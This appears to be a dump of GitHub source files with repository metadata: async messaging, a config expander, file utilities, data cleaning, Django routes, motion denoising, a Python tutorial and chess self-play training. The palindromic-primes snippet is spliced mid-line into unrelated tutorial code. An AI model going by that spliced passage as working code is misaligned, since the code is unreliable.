== 'status.reverse.exit':\n await self._process_reverse_event(data, device)\n except Exception as e:\n try:\n await self.__dbconnector_is.callproc('is_processes_upd', rows=0, values=[self.name, 1, 1, datetime.now()])\n except:\n pass\n await self.__logger.exception({'module': self.name})\n\n # dispatcher\n async def _dispatch(self):\n while not self.eventsignal:\n await self.__dbconnector_is.callproc('is_processes_upd', rows=0, values=[self.name, 1, 0, datetime.now()])\n try:\n await self.__amqpconnector.receive(self._process)\n except (ChannelClosed, ChannelInvalidStateError):\n pass\n except asyncio.CancelledError:\n pass\n else:\n await self.__dbconnector_is.callproc('is_processes_upd', rows=0, values=[self.name, 0, 0, datetime.now()])\n\n async def _signal_cleanup(self):\n await self.__logger.warning({'module': self.name, 'msg': 'Shutting down'})\n closing_tasks = []\n closing_tasks.append(self.__dbconnector_is.disconnect())\n closing_tasks.append(self.__dbconnector_ws.disconnect())\n closing_tasks.append(self.__amqpconnector.disconnect())\n closing_tasks.append(self.__logger.shutdown())\n await asyncio.gather(*closing_tasks, return_exceptions=True)\n\n async def _signal_handler(self, signal):\n # stop while loop coroutine\n self.eventsignal = True\n tasks = [task for task in asyncio.all_tasks(self.eventloop) if task is not\n asyncio.tasks.current_task()]\n for t in tasks:\n t.cancel()\n asyncio.ensure_future(self._signal_cleanup())\n # perform eventloop shutdown\n try:\n self.eventloop.stop()\n self.eventloop.close()\n except:\n pass\n # close process\n sys.exit(0)\n\n def run(self):\n # use own event loop\n uvloop.install()\n self.eventloop = asyncio.new_event_loop()\n asyncio.set_event_loop(self.eventloop)\n signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)\n # add signal handler to loop\n for s in signals:\n self.eventloop.add_signal_handler(s, functools.partial(asyncio.ensure_future,\n self._signal_handler(s)))\n # try-except statement\n try:\n self.eventloop.run_until_complete(self._initialize())\n self.eventloop.run_until_complete(self._dispatch())\n except asyncio.CancelledError:\n pass\n","repo_name":"rsaleev/integration","sub_path":"api/events/exit.py","file_name":"exit.py","file_ext":"py","file_size_in_byte":18036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39515371865","text":"import os\nimport re\n\nfrom dodo_commands.framework.command_error import CommandError\nfrom dodo_commands.framework.config_key import Key\nfrom dodo_commands.framework.util import EnvironMemo, xpath_to_string\n\n\nclass DictKey:\n def __init__(self, the_dict, the_key, xpath):\n self.dict = the_dict\n self.key = the_key\n self.xpath = xpath\n\n def __repr__(self): # noqa\n return \"DK[%s]\" % self.key\n\n def warning_msg_not_expanded(self):\n return \"Unexpanded key {key} at location {xpath}\".format(\n key=self.key, xpath=xpath_to_string(self.xpath)\n )\n\n def create_dict_val(self, expanded_key): # noqa\n if expanded_key != self.key:\n self.dict[expanded_key] = self.dict[self.key]\n del self.dict[self.key]\n return DictVal(self.dict, expanded_key, self.xpath)\n\n\nclass DictVal:\n def __init__(self, the_dict, the_key, xpath):\n self.dict = the_dict\n self.key = the_key\n self.xpath = xpath\n\n def get_value(self):\n return self.dict[self.key]\n\n def replace_value(self, new_value):\n self.dict[self.key] = new_value\n\n def warning_msg_not_expanded(self):\n return \"Unexpanded value {val} at location {xpath}\".format(\n 
val=self.get_value(), xpath=xpath_to_string(self.xpath)\n )\n\n def __repr__(self): # noqa\n return \"DV[%s]\" % self.key\n\n\nclass ListVal:\n def __init__(self, the_list, the_idx, xpath):\n self.idx = the_idx\n self.list = the_list\n self.xpath = xpath\n\n def get_value(self):\n return self.list[self.idx]\n\n def replace_value(self, new_value):\n self.list[self.idx] = new_value\n\n def warning_msg_not_expanded(self):\n return \"Unexpanded value {val} at location {xpath}\".format(\n val=self.get_value(), xpath=xpath_to_string(self.xpath)\n )\n\n def __repr__(self): # noqa\n return \"L[%s]\" % self.idx\n\n\ndef get_key_expressions(search_string, key_regexp=r\"\\$\\{(/[^\\}]*)\\}\"):\n return [x for x in re.finditer(key_regexp, search_string)]\n\n\nclass ConfigExpander:\n \"\"\"Expand environment variables and references in the config.\"\"\"\n\n def __init__(self, extra_vars=None):\n self.extra_vars = extra_vars or {}\n\n def _expand_str(self, current_str):\n expanded_str = current_str\n key_expressions = get_key_expressions(current_str)\n known_strs = []\n\n while key_expressions:\n changed = False\n for key_expression in reversed(key_expressions):\n xpath_string = key_expression.group(1)\n\n key = Key(self.config, xpath_string)\n if key.exists():\n expanded_str = (\n expanded_str[: key_expression.start()]\n + str(key.get())\n + expanded_str[key_expression.end() :]\n )\n\n if expanded_str not in known_strs:\n known_strs.append(expanded_str)\n changed = True\n\n if not changed:\n return None\n\n current_str = expanded_str\n key_expressions = get_key_expressions(current_str)\n\n with EnvironMemo(self.extra_vars):\n expanded_str = os.path.expandvars(expanded_str)\n\n env_key_expressions = get_key_expressions(expanded_str, r\"\\$\\{([^\\}]*)\\}\")\n return expanded_str if not env_key_expressions else None\n\n def _expand(self, raw_obj):\n if isinstance(raw_obj, str):\n return self._expand_str(raw_obj)\n\n if isinstance(raw_obj, list):\n return [self._expand(x) for x in raw_obj]\n\n if isinstance(raw_obj, dict):\n return {self._expand(k): self._expand(v) for k, v in raw_obj.items()}\n\n return raw_obj\n\n def _schedule_children(self, obj, todo, xpath):\n if isinstance(obj, dict):\n for k in obj:\n todo.append(DictKey(obj, k, xpath + [k]))\n return True\n if isinstance(obj, list):\n for idx in range(len(obj)):\n todo.append(ListVal(obj, idx, xpath + [idx]))\n return True\n\n def run(self, config, callbacks=None): # noqa\n nodes = []\n self.config = config\n self._schedule_children(config, nodes, [])\n\n changed = True\n while len(nodes) and changed:\n changed = False\n new_nodes = list()\n for node in nodes:\n if isinstance(node, DictKey):\n expanded_key = self._expand(node.key)\n if expanded_key is None:\n new_nodes.append(node)\n else:\n changed = True\n new_nodes.append(node.create_dict_val(expanded_key))\n elif isinstance(node, DictVal) or isinstance(node, ListVal):\n value = node.get_value()\n if self._schedule_children(value, new_nodes, node.xpath):\n changed = True\n else:\n expanded_value = self._expand(value)\n if expanded_value is None:\n new_nodes.append(node)\n else:\n changed = True\n\n node.replace_value(expanded_value)\n if xpath_to_string(node.xpath) in (callbacks or {}):\n callbacks[xpath_to_string(node.xpath)](expanded_value)\n else:\n raise CommandError(\"Should not reach here\")\n\n nodes = new_nodes\n\n warnings = [\"Warning: %s\\n\" % node.warning_msg_not_expanded() for node in nodes]\n return 
warnings\n","repo_name":"mnieber/dodo-commands","sub_path":"dodo_commands/framework/config_expander.py","file_name":"config_expander.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"26616862281","text":"# -*- coding:utf-8 -*-\nimport os,sys,time\nimport hashlib\nimport chardet\n\nfrom .LOG_sf import logger\n\nprint('Good Luck!')\ndef GetFileHash(fname):\n f = None\n bRet = False\n strSha1 = \"\"\n try:\n f = open( fname, 'rb')\n sha1 = hashlib.sha1()\n strRead = ''\n while True:\n strRead = f.read(8096)\n if not strRead:\n break\n else:\n sha1.update(strRead)\n bRet = True\n strSha1 = sha1.hexdigest()\n except Exception:\n bRet = False\n # logger.exception() needs a message argument\n logger.exception('GetFileHash failed for %r', fname)\n finally:\n if f:\n f.close()\n return [ bRet, strSha1 ]\ndef GetContent(fname):\n ftt = None\n #print(\"Go: ftt = open( fname, 'r', encoding = 'utf-8' )\")\n logger.debug(\"Go: ftt = open( fname, 'r', encoding = 'utf-8' )\")\n logger.debug(\"GetContent ---> %r\", fname)\n try:\n #pdb.set_trace()\n logger.debug('%r',fname)\n ftt = open( fname, 'r', encoding = 'utf-8' )\n fcontent = ftt.readlines()\n except Exception:\n #logger.exception('error msg: Loading file with sysdefault codepage again')\n print('error msg: Loading file with sysdefault codepage again')\n # detect the codepage without leaking the file handle\n with open(fname, 'rb') as fb:\n encodett = chardet.detect(fb.read())['encoding']\n try:\n #pdb.set_trace()\n ftt = open( fname, 'r', encoding = encodett )\n fcontent = ftt.readlines()\n except Exception as e:\n print('error msg: Fail to load file--->%s' % fname)\n #logger.exception('error msg')\n #logger.info( 'Fail to load file--->%s',fname )\n return 0\n finally:\n if ftt:\n ftt.close()\n flineargs = []\n ftti = 1\n for fci in fcontent:\n flineargs.append(( fci, ftti ))\n ftti = ftti + 1 \n return flineargs\n\n \n \n","repo_name":"zhixingheyi666/python_learn","sub_path":"codein/fc/FileFunc.py","file_name":"FileFunc.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"8744144596","text":"# Python 101-02 - Example 1\n# Moves multiple files into multiple folders and renames them\n# It takes the name of a PDF file, creates a folder based on that name, moves the PDF into the new folder, and renames the file to ad.pdf\n\nimport os\n\nfor filename in os.listdir(r\"C:\\Users\\Muhammad\\Desktop\\New Jobs Copy\"): # Pay attention to the ending : for a for loop\n if filename.endswith('.pdf'): \n print(filename)\n \n# This is how we check for PDF files; otherwise folders and other extensions would show up. \n# Also pay attention to the ending : for an if statement\n\n# This was a simple test. Now let's create a folder for each PDF file using the same name as the PDF file\nrootFolder = r\"C:\\Users\\Muhammad\\Desktop\\New Jobs Copy\"\n\nfor filename in os.listdir(rootFolder): # Pay attention to the ending : for a for loop\n if filename.endswith('.pdf'): \n newFolderPath = rootFolder + '\\\\' + os.path.splitext(filename)[0] # We simply remove the file extension to get the path of the new folder! 
[1] is the .extension\n \n print(newFolderPath)\n\n if not os.path.exists(newFolderPath):\n os.mkdir(newFolderPath)\n\n os.rename(rootFolder + '\\\\' + filename, newFolderPath + '\\\\ad.pdf')\n# End!","repo_name":"sadafproducts/Python101-02","sub_path":"move multiple files.py","file_name":"move multiple files.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"34893626444","text":"\r\n# %% Import data\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv(r'DANE.csv', encoding='unicode_escape')\r\n\r\n# %% Select the rows containing missing values\r\n\r\npuste_wartosci = df[df['zgony'].isna()]\r\n\r\npuste_wartosci_zgony_1996_1997 = puste_wartosci.loc[(puste_wartosci['Rok'] == 1996) | (puste_wartosci['Rok'] == 1997)]\r\n\r\n\r\n# %% Valid voivodeship names\r\npoprawne_nazwy = df.loc[(~df['Nazwa'].str.isalpha())]\r\n\r\n# %% Drop the rows with missing data\r\n\r\ndf_bez_lat_1996_1997 = df.drop(df[(df.Rok == 1996) | (df.Rok == 1997)].index)\r\ndf_bez_lat_1996_1997 = df_bez_lat_1996_1997.reset_index(drop=True)\r\n\r\n\r\n# %% Impute the missing values for 1998\r\nfrom sklearn.impute import KNNImputer\r\n\r\nimputer = KNNImputer(n_neighbors=8)\r\ndf_bez_lat_1996_1997_drop_name = df_bez_lat_1996_1997.drop(columns='Nazwa')\r\ndf_bez_lat_1996_1997_uzupelnione_1998 = pd.DataFrame(imputer.fit_transform(\r\n df_bez_lat_1996_1997_drop_name), \r\n columns = df_bez_lat_1996_1997_drop_name.columns)\r\n\r\n\r\ndf_uzupelnione = df_bez_lat_1996_1997.copy()\r\n# take just the imputed 'zgony' column\r\ndf_uzupelnione.loc[df_bez_lat_1996_1997_uzupelnione_1998.index, 'zgony'] = df_bez_lat_1996_1997_uzupelnione_1998['zgony']\r\n\r\n\r\nprint(df_uzupelnione.isnull().sum())\r\n\r\n\r\n# %% Add a column with deaths per 100,000 inhabitants\r\ndf_obliczone = df_uzupelnione.copy()\r\n\r\ndf_obliczone['Zgony_per_100k'] = (df_uzupelnione.zgony / df_uzupelnione.populacja) * 100000\r\ndf_obliczone['Zgony_per_100k'] = df_obliczone['Zgony_per_100k'].round(2)\r\n\r\n\r\n# %% Format the voivodeship names\r\n\r\ndf_poprawa_nazw = df_obliczone.copy()\r\ndf_poprawa_nazw['Nazwa'] = df_poprawa_nazw['Nazwa'].str.title()\r\n\r\n# match the mojibake spelling of Swietokrzyskie present in the source data\r\ndf_poprawa_nazw['Nazwa'] = df_poprawa_nazw['Nazwa'].str.replace(r\"\\Swie˜Tokrzyskie\\b\", \"Swietokrzyskie\")\r\n\r\n\r\n# %% Save the output file\r\ndf_poprawa_nazw.to_csv(r'DANEOczyszczone.tsv', sep='\\t')\r\n\r\n","repo_name":"michalOruba/dash_app","sub_path":"Czyszczenie_danych.py","file_name":"Czyszczenie_danych.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"25903724455","text":"from django.urls import path, re_path\nfrom . 
import views\nfrom .views import CourseListJson, StudentListJson\nfrom django.conf.urls import url, include\nfrom django.contrib.auth.decorators import login_required\n\napp_name=\"web\"\nhandler404 = \"web.views.page404\"\n\n# NOTE: the (?P<...>) group names below are assumed placeholders (course_id, student_id,\n# exp_id, user_id, msg_id, ...); the originals were lost and these only need to match the\n# keyword arguments of the corresponding views.\nurlpatterns = [\n re_path(r'home/$', views.home, name='home'),\n re_path(r'logout/$', views.logout_method, name='logout'),\n re_path(r'login/$', views.login_method, name='login'),\n re_path(r'register/$', views.register, name='register'),\n re_path(r'course/list$', views.courses_list, name='course_list'),\n re_path(r'course/create/$', views.course_edit, name='course_create'),\n re_path(r'course/edit/$', views.course_edit, name='course_edit'),\n re_path(r'course/edit/(?P<course_id>\w+)$', views.course_edit, name='course_edit'),\n re_path(r'course/delete/$', views.course_delete, name='course_delete'),\n re_path(r'course/delete/(?P<course_id>\w+)$', views.course_delete, name='course_delete'),\n re_path(r'course/read/(?P<course_id>\w+)$', views.course_read, name='course_read'),\n re_path(r'course/read/(?P<course_id>\w+)/students/$', views.course_students, name='course_students'),\n re_path(r'course/read/(?P<course_id>\w+)/students/invite$', views.course_invite, name='course_invite'),\n re_path(r'course/read/(?P<course_id>\w+)/students/(?P<student_id>\w+)/ban$', views.course_ban, name='course_ban'),\n re_path(r'course/read/(?P<course_id>\w+)/students/(?P<student_id>\w+)$', views.studentCourseProfile, name='student_courseprofile'),\n re_path(r'course/api/(?P<course_id>\w+)/(?P<student_id>\w+)$', views.getStudentResultData, name='student_getdata'),\n re_path(r'course/api/(?P<course_id>\w+)/(?P<student_id>\w+)/(?P<exp_id>\w+)$', views.getStudentResultData, name='student_getdata'),\n url(r'^my/datatable/data/stud$', login_required(StudentListJson.as_view()), name='course_student_list_json'),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/$', views.course_experience, name='course_experience'),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/(?P<exp_id>\w+)$', views.course_exp_visibility, name='course_exp_visibility'),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/(?P<exp_id>\w+)/test$', views.experience_test, name='experience_test'),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/(?P<exp_id>\w+)/test/edit$', views.experience_test_edit, name='experience_test_edit'),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/(?P<exp_id>\w+)/test/visibility$', views.experience_test_visibility, name='experience_test_visibility'),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/(?P<exp_id>\w+)/test/delete$', views.experience_test_delete, name='experience_test_delete'),\n url(r'^my/datatable/data/$', login_required(CourseListJson.as_view()), name='course_list_json'),\n re_path(r'404/$', views.page404, name='404'),\n re_path(r'user/(?P<user_id>\d+)/profile/$', views.profile, name='profile'),\n re_path(r'user/(?P<user_id>\d+)/profile/edit$', views.profile_edit, name='profile_edit'),\n re_path(r'user/(?P<user_id>\d+)/inbox/(?P<msg_id>\d+)/$', views.message_view, name='msg_view'),\n re_path(r'user/(?P<user_id>\d+)/inbox/message/(?P<msg_id>\d+)/(?P<action_id>\d+)$', views.msg_actions, name='msg_actions'),\n re_path(r'user/(?P<user_id>\d+)/inbox/message/direct$', views.msg_direct, name='msg_direct'),\n re_path(r'support/$', views.support, name='support'),\n re_path(r'support/exp$', views.send_experience, name='support_experience'),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/video/$', views.experience_video, name=\"video\"),\n re_path(r'course/read/(?P<course_id>\w+)/experiences/(?P<exp_id>\w+)/delete/$', views.delexpcourse, name=\"delexpcourse\"),\n re_path(r'user/(?P<user_id>\d+)/experiences/$', views.myexperiences, name=\"myexps\"),\n re_path(r'user/(?P<user_id>\d+)/experiences/add$', views.addexperiences, name=\"addexps\"),\n re_path(r'user/(?P<user_id>\d+)/experiences/(?P<exp_id>\d+)/edit$', views.editexperiences, name=\"editexps\"),\n re_path(r'user/(?P<user_id>\d+)/experiences/(?P<exp_id>\d+)/delete$', views.delexperiences, name=\"delexps\"),\n re_path(r'user/(?P<user_id>\d+)/expcourse/(?P<expcourse_id>\d+)/date$', views.datepicker, name=\"date\"),\n]\n","repo_name":"roloow/umvral","sub_path":"web-service/webumvral/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"39483890951","text":"\"\"\"\nDenoise the input and reconstruct.\n\"\"\"\nfrom showcase_utils import *\nfrom tbase.skeleton import Skeleton\nfrom plotter import show_np_arrays\n\nfs = tf.app.flags\nfs.DEFINE_string('model', 'none', 'which model to use for the prediction, expected format is \"model_name/run_id[ft]\" [none]')\nfs.DEFINE_integer('samples', 3, 'amount of examples to be shown')\n\nFLAGS = fs.FLAGS\n\n\ndef add_random_zeros(batch):\n rng = np.random.RandomState(8004)\n mask = np.zeros(batch.inputs_.shape, dtype=bool)\n batch_size = mask.shape[0]\n noise_amount = 0.3\n nr_joints = len(Skeleton.ALL_JOINTS) - 1 # minus root\n nr_frames = mask.shape[2]\n\n for i in range(batch_size):\n for f in range(nr_frames):\n suppress_joint = rng.binomial(1, noise_amount, nr_joints)\n idxs = np.where(suppress_joint != 0)\n idxs_j = (idxs[0] + 1)*3\n mask[i, idxs_j + 0, f] = True\n mask[i, idxs_j + 1, f] = True\n mask[i, idxs_j + 2, f] = True\n\n batch_noise = batch.copy()\n batch_noise.inputs_[mask] = 0.0\n return batch_noise, mask\n\n\ndef add_gaussian_noise(batch, std=0.5):\n rng = np.random.RandomState(8004)\n noise = rng.randn(*batch.inputs_.shape)*std\n # add the noise to the velocities\n n_coords = len(Skeleton.ALL_JOINTS)*3\n noise[:, n_coords:n_coords+3] = 0.0\n batch.inputs_ = batch.inputs_ + noise\n return batch\n\n\ndef main(argv):\n if len(argv) > 1:\n # we have some unparsed flags\n raise ValueError('unknown flags: {}'.format(' '.join(argv[1:])))\n\n # parse the --model flag\n model_name, run_id, discard_foot_contacts, replace_traj = utils.extract_model_name_and_run(FLAGS.model)\n\n # get the location of the model\n model_path = get_model_path(model_name, run_id)\n\n # get a random validation batch\n normalizer = get_normalizer(model_path)\n rng = np.random.RandomState(4313)\n feeder = get_feeder(normalizer=None, discard_foot_contacts=discard_foot_contacts, batch_size=FLAGS.samples, rng=rng)\n batch = feeder.random_valid_batch(rng)\n\n use_gaussian_noise = True\n if use_gaussian_noise:\n # apply gaussian noise to the original input\n batch_noise = add_gaussian_noise(batch, std=1.0)\n ori = np.copy(batch_noise.inputs_)\n\n # then normalize\n batch_noise.inputs_ = normalizer.normalize(batch_noise.inputs_)\n\n # show_np_arrays(batch_noise.inputs_[0:1], '', [''])\n else:\n # set values to 0 in both original and normalized version so that we can visualize\n batch.inputs_ = normalizer.normalize(batch.inputs_)\n batch_noise, noise_mask = add_random_zeros(batch)\n\n # apply perturbation to the original\n ori = np.copy(normalizer.unnormalize(batch.inputs_))\n ori[noise_mask] = 0.0\n\n # get matrix showing which joints were masked out\n # joints_mask = noise_mask[:, np.array(list(range(1, 22)))*3]\n # ids = [id_ for (_, _, id_, _) in batch.all_entries()]\n # for i in range(joints_mask.shape[0]):\n # m = joints_mask[i]\n # fname = 'zero_denoising_mask_id{}.txt'.format(ids[i])\n # np.savetxt(fname, np.array(m, dtype=np.int64), delimiter=',', fmt='%d')\n\n # get the prediction\n pred = 
get_prediction_from_model(model_path, test_batch=batch_noise)\n\n # unnormalize the prediction\n pred_un = normalizer.unnormalize(pred)\n targets = batch_noise.targets\n # targets = normalizer.unnormalize(batch_noise.targets)\n\n # Compute joint reconstruction error.\n from tbase.skeleton import to_global_batched\n body_dim = len(Skeleton.ALL_JOINTS) * 3\n traj = targets[:, body_dim:body_dim + 3]\n pred_global = to_global_batched(pred_un, override_trajectory=traj,\n override_root=targets[:, 0:3]) # (N, n_joints, 3, seq_len)\n ori_global = to_global_batched(ori, override_trajectory=traj,\n override_root=targets[:, 0:3])\n targets_global = to_global_batched(targets) # (N, n_joints, 3, seq_len)\n\n # Compute 3D reconstruction error per joint and frame w.r.t. the target.\n joint_error = np.linalg.norm(pred_global - targets_global, axis=2)\n joint_error = np.transpose(joint_error, [0, 2, 1]) # (N, seq_len, n_joints)\n print('3d joint error:', np.mean(joint_error), np.std(joint_error))\n\n # Compute initial reconstruction error between noisy and target sample.\n joint_error_init = np.linalg.norm(ori_global - targets_global, axis=2)\n joint_error_init = np.transpose(joint_error_init, [0, 2, 1]) # (N, seq_len, n_joints)\n print('3d joint error init:', np.mean(joint_error_init), np.std(joint_error_init))\n\n base_name = 'gaussian_denoising' if use_gaussian_noise else 'zero_denoising'\n ori_names = ['{}_ori_id{}'.format(base_name, id_) for (_, _, id_, _) in batch.all_entries()]\n pred_names = ['{}_pred_id{}'.format(base_name, id_) for (_, _, id_, _) in batch.all_entries()]\n names = [ori_names, pred_names]\n\n # visualize\n show_motions([ori, pred_un], interp_idxs=np.array([0]*pred_un.shape[0]),\n names=names, draw_cylinders=True)\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n","repo_name":"eth-ait/motion-infilling","sub_path":"infilling/showcase_denoising.py","file_name":"showcase_denoising.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"40"}
+{"seq_id":"9920018770","text":"\"\"\"palindromic primes\nringo shima\n9/5/14\"\"\"\nimport math\nimport sys\nimport question1\nsys.setrecursionlimit (30000)\n\ndef primepal(n,m,x):\n #base case\n if n==m:\n x = str(n)\n y = question1.pal(x) #run q1 module\n if y == \"Palindrome!\": \n return x\n else:\n return x\n \n elif n= 18:\n print('age is 18 or older')\nelif age >= 10:\n print('age is at least 10 but under 18')\nelse:\n print('age is under 10')\n\n# convert a string to an integer\nmyStr = '1888'\nmyNum = int(myStr)\nprint(myNum)\n\n# for loop\nfor i in myLists:\n print(i)\n\nsum = 0\nfor x in range(101):\n sum = sum + x\nprint(sum)\n\n# while loop\nn = 0\nwhile n < len(myLists):\n print(myLists[n])\n n = n + 1\n\n## functions\ndef myDef(x):\n if x >= 0:\n return x\n else:\n return -x\n\nprint(myDef(-9))\n\n# function parameters, default arguments\ndef myDef2 (x, n = 2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\nprint(myDef2(10, 3))\n\n# a default argument must point to an immutable object\ndef myDef3(l = []):\n l.append('end')\n return l\n\nprint(myDef3([1,2,3]))\n\nprint(myDef3())\n\nprint(myDef3()) # prints two 'end's: the default list has already been mutated\n\ndef myDef4(l = None):\n if l is None:\n l = []\n l.append('end')\n return l\n\nprint(myDef4())\nprint(myDef4())\n\n# list slicing: start inclusive, end exclusive\nprint(myLists[0:2])\n# first two\nprint(myLists[:2])\n# last two\nprint(myLists[-2:])\n# string slicing\nprint('abcdefg'[:2])\n\n# iteration\nfor i, val in enumerate(myTuple):\n print(i,val)\n\n# a generator stores the algorithm, not the resulting list\ndef myDef5(max):\n n, a, b = 0, 0, 1\n while n < max:\n yield b\n a, b = b, a + b\n n = n + 1\n return 'done'\n\nfor n in myDef5(6):\n print(n)\n\n# higher-order functions can take another function as an argument\ndef myDef6(a, b, f):\n return f(a) - f(b)\n\nprint(myDef6(-5,6,abs))\n\n# anonymous functions: lambda (keyword) x (parameter):\nprint(list(filter(lambda x: x % 2 == 1, range(1, 20))))\n\n# classes\n# attributes whose names start with __ are private: they cannot be accessed from outside and are read or changed through methods\nclass Student(object):\n def __init__(self, name, score):\n self.__name = name\n self.__score = score\n\n def print_score(self):\n print('%s : %s' % (self.__name, self.__score))\n\n def get_name(self):\n return self.__name\n\n def get_score(self):\n return self.__score\n\n def set_name(self, name):\n self.__name = name\n\nxiaoming = Student('xiao ming', 88)\n\nxiaoming.set_name('da ming')\nxiaoming.print_score()\n\n# read a file\nwith open('./txt.txt', 'r') as f:\n # print(f.read())\n\n for line in f.readlines():\n print(line.strip())\n\n# get system information\nimport os\nprint(os.name)\n\nprint('1' * 5)\n\n# time\nimport time\nprint(time)","repo_name":"nijun008/demo","sub_path":"python-demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"14673940247","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom model import load_existing_model, NUMBER_OF_POSSIBLE_MOVES\nimport chess\nfrom MoveMapping import map_valid_move\nfrom network import FEN_to_layers\nimport numpy as np\nfrom self_play import SelfPlay\nfrom settings import NUMBER_OF_EPOCHS_PER_GAME, MODEL_NAME, NUMBER_OF_CONSIDERED_POSITIONS, \\\n NUMBER_OF_GAMES_PER_ITERATION, NUMBER_OF_ITERATION_IN_TRAINING, N_MCTS_ITERATION, POLICY_SHAPE_3D, \\\n NUMBER_OF_EPOCHS_PER_ITERATION\nimport sqlite3\nimport datetime\nfrom time import time\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\n\ndef create_history_db():\n con = sqlite3.connect('./models/training_history.db')\n cur = con.cursor()\n cur.execute(\"\"\"CREATE TABLE history(training_date text, \n number_of_games INTEGER, \n number_of_MCTS_simulations INTEGER, \n n_of_draws INTEGER,\n n_of_white_wins INTEGER,\n n_of_black_wins INTEGER,\n games_not_ended INTEGER, \n time_of_learning text)\"\"\")\n\n\ndef add_record(n_of_games: int, n_of_MCTS: int, n_of_draws: int, n_of_white_wins: int, n_of_black_wins: int, games_not_ended: int, time_of_learning: str) -> bool:\n try:\n now = datetime.datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n con = sqlite3.connect('./models/training_history.db')\n cur = con.cursor()\n cur.execute(\"\"\"INSERT INTO history VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\"\",\n (dt_string, n_of_games, n_of_MCTS, n_of_draws, n_of_white_wins, n_of_black_wins, games_not_ended, time_of_learning))\n con.commit()\n con.close()\n return True\n except Exception:\n return False\n\n\ndef read_all():\n conn = sqlite3.connect('./models/training_history.db')\n c = conn.cursor()\n c.execute(\"\"\"SELECT rowid,* from history\n \"\"\")\n for el in c.fetchall():\n print(el)\n conn.close()\n\n\ndef plot_results(loss, policy_loss, value_loss, game_number: int=0, n_epochs=20):\n epochs = [i for i in range(1, n_epochs+1)]\n plt.figure()\n plt.plot(epochs, loss, label='Loss')\n plt.plot(epochs, value_loss, label='Value head loss')\n plt.plot(epochs, policy_loss, label='Policy head loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Self-play game training history')\n plt.legend()\n plt.grid()\n # save before show(); with some backends show() leaves an empty current figure behind\n plt.savefig(f'Loss of game{game_number}')\n plt.show()\n\n\ndef train(model_name: str = MODEL_NAME, number_of_games: int = 10, number_of_iterations: int = 10):\n model = load_existing_model(name=model_name)\n self_play = 
SelfPlay(model=model)\n\n time_start = time()\n black_wins = 0\n white_wins = 0\n draws = 0\n games_not_ended = 0\n for iteration in tqdm(range(number_of_iterations)):\n \"\"\"Initialize number of games data\"\"\"\n position_data_records = list()\n move_probabilities_data_records = list()\n position_evaluation_data_records = list()\n x_general: np.array\n y_general: list = []\n for game_number in range(number_of_games):\n position_data, moveProbabilitiesData, positionEvalData = self_play.playGame()\n \"\"\"Increasing data\"\"\"\n result = positionEvalData[-1]\n if 0.4 <= result:\n white_wins += 1\n elif -0.4 <= result <= 0.4:\n draws += 1\n elif result <= -0.4:\n black_wins += 1\n else:\n games_not_ended += 1\n\n moveProbabilitiesDataConverted = list()\n for i, record in enumerate(moveProbabilitiesData[NUMBER_OF_CONSIDERED_POSITIONS:]):\n moveProbabilities = np.zeros(shape=POLICY_SHAPE_3D)\n for move, val, _, _ in record:\n move, plane_index, col, row = map_valid_move(move, chess.Board(position_data[i+NUMBER_OF_CONSIDERED_POSITIONS]))\n moveProbabilities[plane_index][col][row] = val\n moveProbabilitiesDataConverted.append(moveProbabilities.reshape((NUMBER_OF_POSSIBLE_MOVES, 1)))\n\n \"\"\"Adding records to n-games database\"\"\"\n move_probabilities_data_records.append(moveProbabilitiesDataConverted)\n position_evaluation_data_records.append(position_data_records)\n position_data_records.append(position_data)\n\n data_length = len(position_data)\n posEvalDataTrain = [np.array([evaluation]) for evaluation in positionEvalData[NUMBER_OF_CONSIDERED_POSITIONS:]]\n if game_number == 0:\n x_general = np.array([FEN_to_layers(position_data[NUMBER_OF_CONSIDERED_POSITIONS+i: NUMBER_OF_CONSIDERED_POSITIONS+i+NUMBER_OF_CONSIDERED_POSITIONS]) for i in range(data_length - NUMBER_OF_CONSIDERED_POSITIONS)])\n y_general = [np.array(moveProbabilitiesDataConverted), np.array(posEvalDataTrain)]\n else:\n x_new_game = np.array([FEN_to_layers(position_data[NUMBER_OF_CONSIDERED_POSITIONS+i: NUMBER_OF_CONSIDERED_POSITIONS+i+NUMBER_OF_CONSIDERED_POSITIONS]) for i in range(data_length - NUMBER_OF_CONSIDERED_POSITIONS)]) # -1 is last position where is no available moves\n x_last = x_general\n y_last = y_general\n x_general = np.append(x_last, x_new_game, axis=0)\n y_general = [np.append(y_last[0], np.array(moveProbabilitiesDataConverted), axis=0), np.append(y_last[1], np.array(posEvalDataTrain), axis=0)]\n\n 